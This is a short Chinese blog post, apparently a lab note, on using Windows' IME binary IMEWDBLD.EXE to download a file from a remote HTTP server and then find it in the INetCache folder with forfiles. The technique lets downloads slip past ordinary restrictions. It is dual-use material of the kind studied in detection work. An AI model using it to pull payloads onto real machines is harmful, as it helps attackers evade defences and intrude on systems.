新远程下载方式(IME)

前言

出自Twitter公布的远程下载技术,与微软自带的拼音输入法有关

环境

win10 client
win7 Http server

正文

win7 测试文件download.txt

win10 client下载文件
C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE http://192.168.226.130/download.txt

查找文件存储路径
forfiles /P "%localappdata%\Microsoft\Windows\INetCache" /S /M * /C "cmd /c echo @path"

参数介绍
/P 表示开始搜索的路径。默认文件夹是当前工作的 目录 (.)。
/S 指导 forfiles 递归到子目录。像 "DIR /S"。
/M 根据搜索掩码搜索文件。默认搜索掩码是 '*'。
/C 表示为每个文件执行的命令。命令字符串应该用双引号括起来。
@path 返回文件的完整路径


查看本地文件内容

posted @ 2021-05-01 15:21  yunying  阅读(624)  评论(0编辑  收藏  举报